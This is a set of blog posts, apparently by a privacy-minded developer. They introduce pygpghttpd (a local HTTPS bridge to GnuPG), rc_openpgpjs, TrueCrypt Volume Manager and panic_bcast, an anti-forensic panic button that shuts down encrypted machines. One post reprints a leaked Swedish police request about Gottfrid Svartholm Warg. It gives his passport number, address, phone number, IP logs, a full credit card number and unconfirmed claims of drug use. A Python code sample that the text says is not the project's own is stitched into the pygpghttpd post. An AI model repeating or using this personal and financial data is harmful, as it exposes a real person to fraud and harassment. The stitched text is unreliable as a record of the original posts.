The users that care more about their security and privacy are demanding solutions aligned with their requirements, and JavaScript implemented cryptography is by design insecure due to the surrounding threats in its domain. These users are actively choosing not to use JavaScript ported functionality but instead continue to use their local binaries that have been around and audited for decades longer than newborn ports. And they are completely correct in doing so, because how can we actually trust JavaScript? We are stepping over the security requirements in order to deliver working solutions faster than science can keep up with it. We are impatient and we need something to work as soon as possible, especially in this day and age with the ongoing war against free unmonitored online communication. By doing so we bypass the most important core ideas of implemented cryptography: security and privacy.

The solution

In order to expose GnuPG functionality to the web we must create an API for it which can perform cryptographic operations with non-sensitive elements, such as armored public keys and private key metadata, without exposing anything of importance. The best way of doing this and successfully integrating it into web browsers is to run a webserver locally which pre-accepted remotely served content can communicate with. The most important detail is that private keys should never ever be available to the web browser but instead reside in the local GnuPG keyring, which the API manipulates through the local GnuPG binary.

I came up with a solution that I named pygpghttpd, which I am currently working on supporting in my OpenPGP plugin for Roundcube: rc_openpgpjs. pygpghttpd is an open source minimalistic HTTPS server written in Python. pygpghttpd exposes an API enabling GnuPG’s cryptographic functionality to be used in web browsers and other software which can make HTTP requests. pygpghttpd runs on the client’s localhost and allows calling GnuPG binaries from the user’s browser securely without exposing cryptographically sensitive data to hostile environments. pygpghttpd bridges the required elements of GnuPG to HTTP, allowing its cryptographic functionality to be called without the need to trust JavaScript based PGP/GPG ports. As pygpghttpd calls local GnuPG binaries it also uses the local keyrings and relies on GnuPG entirely for strength. In short, pygpghttpd is just a dummy task router between the browser and the GnuPG binary.

pygpghttpd acts as an HTTPS server listening on port 11337 for POST requests containing operation commands and parameters to execute. When a request is received it checks the “Origin” HTTP header, or the “Referer” header if “Origin” is missing, to find out which domain served the content that is contacting it. It then checks whether the user has added that domain to the “accepted_domains.txt” file, to ensure that it is only operational for pre-accepted domains. If the referring domain is accepted it processes the request and serves the result from the local GnuPG binary to the client. In the response a Cross-origin resource sharing HTTP header is sent to inform the user’s browser that the request should be permitted. If the referring domain is missing from accepted_domains.txt the user’s browser forbids the request in accordance with the same origin security policy.
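The origin check described above, as an added example in Python (the language pygpghttpd is written in); it is not pygpghttpd's own code. The one-host-per-line file format and the names `load_accepted_domains`, `requesting_origin` and `authorize` are assumptions. It compares the parsed host exactly and decides before any GnuPG call, because a browser sends a form-encoded POST without a preflight and a missing CORS header only hides the response from the page.

```python
from urllib.parse import urlsplit

# Constructed sample of accepted_domains.txt (assumed format: one host per line).
ACCEPTED_DOMAINS_TXT = """\
# domains allowed to talk to the local GnuPG bridge
accepted.domain.com
webmail.example.org
"""


def load_accepted_domains(text):
    """Return the set of lower-cased host names listed in the file content."""
    hosts = set()
    for line in text.splitlines():
        line = line.strip().lower()
        if line and not line.startswith("#"):
            hosts.add(line)
    return hosts


def requesting_origin(headers):
    """Return (origin, host) from Origin, or from Referer when Origin is absent.

    Returns None when neither header yields an http(s) URL with a host.
    """
    lowered = {name.lower(): value for name, value in headers.items()}
    value = lowered.get("origin") or lowered.get("referer")
    if not value:
        return None
    try:
        parts = urlsplit(value.strip())
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return None
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    host = parts.hostname  # lower-cased, with userinfo and port removed
    origin = f"{parts.scheme}://{host}"
    if port is not None:
        origin += f":{port}"
    return origin, host


def authorize(headers, accepted_hosts):
    """Decide before any GnuPG call: (True, CORS headers) or (False, {})."""
    found = requesting_origin(headers)
    if found is None:
        return False, {}
    origin, host = found
    if host not in accepted_hosts:  # exact host match, never a substring test
        return False, {}
    return True, {"Access-Control-Allow-Origin": origin, "Vary": "Origin"}


if __name__ == "__main__":
    accepted = load_accepted_domains(ACCEPTED_DOMAINS_TXT)
    # Constructed request headers: one accepted origin, one look-alike host.
    for hdrs in ({"Origin": "https://accepted.domain.com"},
                 {"Origin": "https://accepted.domain.com.other.example"}):
        print(hdrs, "->", authorize(hdrs, accepted))
```
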

The HTTPS certificate used by pygpghttpd is self-signed and is not used with the intention to enhance security, since all traffic is isolated to the local network interface. It uses HTTPS to ensure that both HTTPS and HTTP delivered content can interact with it.

pygpghttpd exposes metadata for both private and public keys but only allows public keys to be exported from the local keyring. The metadata for private keys is enough for performing cryptographic actions. Complete keypairs can be generated and imported into the local keyring.

For example, generating a keypair with cURL:

curl -k --data "cmd=keygen&type=RSA&length=2048&name=Alice&email=alice@foo.com&passphrase=foobar" -H "Origin: https://accepted.domain.com" https://localhost:11337/

Or from JavaScript:

$.post("https://localhost:11337/", {
  cmd: "keygen",
  type: "RSA",
  length: "2048",
  name: "Alice",
  email: "alice@foo.com",
  passphrase: "foobar"
}, function(data) {
  if(data == "1")
    return true;
  return false;
});

Please see the project on Github, API documentation and example for full details.

Everything important to Sweden is hacked

Saturday, April 27th, 2013

“The case is of Swedish national interest due to the very extensive character of the intrusion. The preliminary investigation involves Swedish authorities such as the Swedish Prosecution Authority, the National Bureau of Investigation (Police), the Stockholm Regional Investigation Unit (Police) and the Swedish Security Service (Security Police). […] The accessed data may cause considerable damage to authorities, companies and individuals. The intrusion handled by the on-going criminal investigation is probably the most serious suffered by Swedish IT-systems linked to public authorities. […] The analysis of the intruded mainframe computer makes it evident that an IP-number connected to Cambodian Internet Service Providers/Hosting Services have been used for part of the criminal intrusions, including extensive copying of sensitive data from the mainframe computer.”

This writing covers the Swedish government’s legal aid request which you can read in PDF format here.

The Swedish government’s request for legal assistance again proves that the kidnapping had nothing to do with TPB. The trial conviction was a cheap flag for Interpol to wave so that the Cambodian authorities would act, unlike how they usually go “meh” over internationally wanted pedophiles and murderers hiding in the region.

4th October, while the prosecution spokesperson told the media that this circus was due to TPB, Cyrus Farivar wrote in an article published by Ars Technica:

“Femerstrand also accused the Swedish Security Service of conducting surveillance of Svartholm Warg in Cambodia, ‘since [at least] March 2012.’ (The Swedish Security Service did not reply to our request for comment.)”

How did I know? They were checking me out too. They visited me in restaurants and documented what I was eating, they photographed the house that I lived in and they filmed me taking out my garbage. Spotting agents is sometimes easy, and probably much easier in Phnom Penh; they don’t blend in. They must’ve sent rookies to Cambodia, I mean we’re talking Hawaii shirts, straw hats and sunglasses. Reading about myself in the intel on Gottfrid as “one or more Swedish hacktivist in Cambodia” confirms my previous suspicions that they did their homework about me.

Evidence in the case has been gathered from equipment seized from the suspects’ possessions, Pastebin, Ubuntu One, Passagen and IRC (primarily EFNet). Two computers seized from one of the suspects were, according to the lawsuit, encrypted and could not be analyzed by forensics personnel. A few individuals living in Sweden have been visited by Swedish Police agents and had equipment seized and forced to sit in hearings with IT forensics staff simply for having online contact with suspects in the case. Several friends who had IRC contact with Gottfrid have noticed hacking attempts on their machines that were traced back to Swedish police agencies. It appears safe to claim that the current police tactic is to throw rocks in the water to observe which rings form.

The Swedish government’s panic request for legal assistance claims that the alleged data breaches, when added together, is historically the most dangerous one targeting the Swedish government – ever. Interestingly enough the media hasn’t dared mentioning it despite it being said in the lawsuit that the machines that were used by the attackers to hack the Swedish Nordea bank (which spent over 10 billion SEK on their secure systems) were in fact owned by the Swedish Parliamentary Administration and the Swedish National Police, which is supposedly also entirely hacked. What should be more interesting to discuss than how somebody allegedly tries to increase some integers in database row columns is how somebody allegedly gained full control of a country’s most important infrastructural parts and not be noticed for two years.

The question regarding whether Gottfrid did or did not attempt to transfer money to his bank account is highly irrelevant. What’s actually interesting in this case is that no matter if Gottfrid is guilty or innocent the Swedish government is right now standing bent over with their pants down saying somebody took control of their most critical systems and they didn’t even notice it for two years, despite somebody taking full copies of the data. These obviously existing security issues are not limited to Sweden. The customers of computer systems, both in the public and private sector, are all purchasing IBM products. IBM mainframes are ranked most secure in the world. Regardless of whether Gottfrid is guilty or innocent the fact remains: somebody has broken the systems on which shoulders all society critical elements stand: governments and banks.

The digitalization of our entire society has been proved to be broken, is the world ready to discuss that or do you want to continue debating the morals of stealing money on a bank mainframe? Open your eyes, the entire world just broke down and a lonesome bearded supposed drug addict is the alleged mastermind. In your face, Sweden.

Tor node gets raided

In June 2012 the Swedish International Public Prosecution Office requested legal aid from Germany to retrieve all data related to IP 217.13.197.5 after it had been discovered that it was used to connect to Logica mainframes. The Berlin police agency raided the address and the IP owned by Speedbone Internet & Connectivity. The server turned out to be a Tor exit node and no information could be retrieved about any users. No evidence was found during the raid and nothing was seized. The mainframe accessed stored big amounts of personal and financial data for the Swedish tax agency. Big amounts of data stored on systems used by the Prosecution Office and police authorities were also accessed and downloaded.

No evidence from Leaseweb

In September 2012 the Swedish International Public Prosecution Office requested legal aid from Germany to retrieve all data related to IP 46.165.196.182. The customer that rented the server could never be found since the service had been terminated a long time before the request arrived and Leaseweb did not keep customer data.

The info below is from the PDF linked at the top and is not in my own words.

Detailed information of suspect (12 July 2012)

National Bureau of Investigation
Cyber Crime Unit
Richard Ahlgren

Family name: SVARTHOLM WARG
Forename: Per Gottfrid
Sex: Male
Date of birth: 17/10/1984
Nationality: Sweden

Passport
Passport number: 23810667
Date of issue: 28/01/2003
Place of issue: Stockholm, Sweden
Expiry date: 28/01/2013

Description (dated 26/05/2011)
Height: 175 cm
Eye colour: Blue
Skin colour: Fair skinned
Hair colour: Medium blonde

Links to Cambodia
In September 2011 the trials concerning The Pirate Bay started in the Svea Court of Appealing. Gottfrid Svartholm Warg was not present and it was told that he was in Phnom Penh, Cambodia. He posted a medical certificate, written in Khmer, to his attorney stating that he suffered from some kind of illness.

According to an article 2009 on the blog of the travel writer Adam Bray, Svartholm Warg had lived for a time in an apartment on top of the Cadillac Bar & Grill in Phnom Penh.

This article also said that Svartholm Warg was the owner of the company Estoy Ltd. Seychelles IBC in Phnom Penh. When he registered the company’s website he stated the phone number +855 929 607 72 (Cambodian number).

In chat logs from the IRC network Svartholm Warg posted in 2009 and 2010 that he was operating from Cambodia. For instance he wrote that he uses the border crossing at Poipet from Thailand to Cambodia.

Driving license
In the seizure from the current investigation a picture of Gottfrid Svartholm Warg’s Cambodian driving license was found. The picture is attached to this document.
Card code: A1.000034
Issue date: 21/01/2009
Address of Svartholm Warg: 4 St. 104 Wat Phnom, Daun Penh

IP information
In chat logs from the investigation Svartholm Warg has been logged on from IP-numbers pointing to Cambodia. These IP-numbers with timestamps are:

124.248.174.161 unknown time Cogetel Online
124.248.167.191 25/03.2012 2015 (UTC 0) Cogetel Online
124.248.187.150 10/03/2012 12:42 (UTC 0) Cogetel Online
124.248.187.22 04/03/2012 16:11 (UTC 0) Cogetel Online

Other IP-numbers pointing to Cambodia in the investigation are:

203.176.141.205 10/03/2012 01:00 (UTC 0) Mekongnet
27.109.118.33 10/03/2012 19:30 (UTC 0) DTV Starnet

Credit card number
A credit card number with the name Gottfrid Svartholm was found in the investigation.
Number: 4111 3418 0000 2947
Expiry date: 12/10
Name: Gottfrid Svartholm
Issuing bank: Acleda Bank PLC, Cambodia

Intelligence information
The information about Svartholm Warg that follows is to be seen as unconfirmed intelligence information:
– he is a drug addict and a frequent user of marijuana and crystal meth
– he is in very bad shape and may have spent time in hospital recently
– he has earlier or recent rented a house in Cambodia from an unknown American citizen
– he may have contact with one or more Swedish hacktivist in Cambodia
– he (and his network) may have access to at least one Internet Service Provider in Cambodia. That ISP is Cogetel.
– he (and his network) may have access to the mail account of the Mayor of Phnom Penh

Request for assistance

Cyber Crime Unit
Richard Ahlgren

Dear colleagues,

The Swedish National Bureau of Investigation is currently involved in a Cyber Crime investigation concerning a serious computer intrusion. In this investigation we request assistance from the Cambodian Police.

Preamble
The criminal offence being investigated is a very serious case of breach of data secrecy according to the Swedish Penal Code Chapter 4, Section 9c. The case is of Swedish national interest due to the very extensive character of the intrusion. The preliminary investigation is handled by several Swedish authorities such as the Swedish Prosecution Authority, the National Bureau of Investigation, the Stockholm Regional Investigation Unit and the Swedish Security Service.

Suspects
Two suspects have been detained during part of the preliminary investigation and we would appreciate your help with a third one. All suspects are Swedish citizens. The third suspect is:

Family name: SVARTHOLM WARG
Forename: Per Gottfrid
Date of birth: 17/10/1984
Sex: Male

Gottfrid Svartholm Warg is suspected for a breach of data secrecy together with others, on numerous occasions during the period January 1 2012 to April 15 2012. There has not yet been application for a detention order.

Svartholm Warg is international wanted (Interpol file number 2012/318024) in another case as a result of an imposed sentence of 1 year imprisonment in the Svea Court of Appeal 17/04/2009. The diffusion is attached.

His present location is unknown though we believe that he lives in Phnom Penh, Cambodia. See more detailed information in the attached files.

Case details
Intrusions have been made against, inter alia, a mainframe computer operated by a private company, hosting large amounts of personal data/census data from the Swedish Tax Agency, including protected personal data, as well as data of financial nature. Large amounts of data from the Enforcement Authority and the Police have been accessed as well.

The accessed data may cause considerable damage to authorities, companies and individuals.

The intrusion handled by the on-going criminal investigation is probably the most serious suffered by Swedish IT-systems linked to public authorities.

Requested assistance
Our request concerns investigative assistance locating the suspect Gottfrid Svartholm Warg. Furthermore we would like assistance with surveillance of the suspect with the purpose of documenting and analyzing his activities, contacts and locations.

In order to locate the suspect, see the attached document with detailed information. There you can find information about, inter alia, IP-addresses, credit card number, driving license and intelligence information. We have tried to collect and analyse information about his specific whereabouts but we cannot come any further. We now need your assistance.

When the suspect has been located the intention of the prosecutor in this case, Senior Public Prosecutor Henrik Olin, is to file a Rogatory Request concerning a search warrant. In addition to the arrest of Svartholm Warg we would like to seize his computers, mobile phones, hard drives, other digital storage media and personal belongings that can be used as evidence in our case. If necessary and if possible Swedish police officers can assist in the house search.

HAND OVER RECORDS

Evidence number Description
1 Hard Drive Seagate 80 G
2 Hard Drive Hitachi 80 G
3 USB Stick
4 USB Stick
5 USB Stick
6 Memory Card
7 Wireless Access Point
8 Binder
9 3G Dongle With Sim Card
10 Modem Zon
11 Sim Card Tele2
12 Plastic Cover belonging to a Switch
13 Paper With Addresses
14 Business Card
15 Paper From EuroBank
16 Baggage Tag
17 Receipt
18 IPhone
19 Nokia Phone
20 Invoice for MacBook
21 Note Book
22 Bankbook
23 Bankbook
24 Bankbook
25 Passport
26 MacBook
27 Plastic Cover belonging to a Router
28 Surveillance Camera, CCTV
29 16 Home Burned CDs
30 Lock Picking Tools
31 Modem Online
32 Key
33 Key

rc_openpgpjs: Ending seven years of Roundcube insecurity

Monday, January 7th, 2013

Roundcube is a popular open source IMAP webmail application. Roundcube is used by Harvard University, UC Berkeley and University of Michigan. Apple Mac OS X 10.7 uses Roundcube by default in its Mail Server. While writing this a lazy Google dork estimates 133 000 public Roundcube installations.

PGP support was first requested seven years ago and set critical six years ago. PGP support has been requested actively ever since. One of the core developers began the development of his PHP implementation, the Enigma plugin, two years ago but the plugin has not been made functional yet.

Today I am proud to release a beta version of my Roundcube plugin that implements PGP using the OpenPGP.js (based on GPG4Browsers) JavaScript library. rc_openpgpjs enables OpenPGP to function in the user’s browser so that fundamental key storage security isn’t immediately broken by design, unlike the official Enigma plugin.

At its current beta stage, rc_openpgpjs is able to generate an encryption key pair, save it in HTML5 web storage (in your own browser, guys) and perform encryption and decryption of email. rc_openpgpjs works in any modern browser that can parse HTML5 and supports the window.crypto object. Unfortunately this is limited to Google Chrome today, but Mozilla is struggling working on it.

rc_openpgpjs is available on Github. rc_openpgpjs will become stable as soon as some small glitches have been corrected. It has been written for Roundcube 0.8.4 with the Larry skin.

Introducing TrueCrypt Volume Manager

Saturday, January 5th, 2013

Linux has DM-CRYPT, FreeBSD has GEOM_ELI and Oracle is holding ZFS encryption options closed source. The incompatible nature of encrypted storage throughout various UNIX systems is an obvious problem. TrueCrypt supports most popular platforms but until now there hasn’t been a simple way to organize and maintain TrueCrypt containers over different types of systems. TrueCrypt Volume Manager aims to be this bridge.

TrueCrypt Volume Manager, shortened TCVM, is a UNIX shell environment written in Python. It provides a simple CLI shell interface to easily create, mount, unmount and list containers and also the possibility to easily change the passphrase of a given encryption container. Since TCVM is intended to run as a UNIX shell this allows you to securely administrate your TrueCrypt containers over the SSH protocol.

TCVM also provides the function to automatically generate secure passphrases for TrueCrypt containers and store the passphrases in a separate container. This function is fully optional to use and is essentially inspired by the KeePass project. TCVM flexes a custom wrapper for TrueCrypt.

Please note that TCVM is still new and may be slightly rough around the edges. I am happy to fix any issue you may encounter.

The project is available on Github.

Introducing panic_bcast

Thursday, December 13th, 2012

panic_bcast is a network protocol panic button operating decentralized through UDP broadcasts and HTTP. It’s intended to act as a panic button in a sensitive network, making it harder to perform cold boot attacks. A serious freedom fighter will run something like this on all nodes in the computerized network.

How it works

1. An activist has uninvited guests at the door
2. The activist sends the panic signal, a UDP broadcast, with panic_bcast
3. Other machines in the network pick up the panic signal
4. Once panic_bcast has picked up the panic signal it kills truecrypt and powers off the machine.

panic_bcast was written with the intention to support any form of UNIX that can run Python. It has been tested successfully on Linux and FreeBSD.

To trigger the panic signal over HTTP simply request http://…:8080/panic from a machine that is running panic_bcast. Whichever will do.

Please note that panic_bcast is a beta and more sophisticated ways to prevent cold boot attacks are planned. You can view these plans by searching for the word “TODO” in the source code.

The source code is available on Github.

Remember kids: there’s no home for swap in opsec.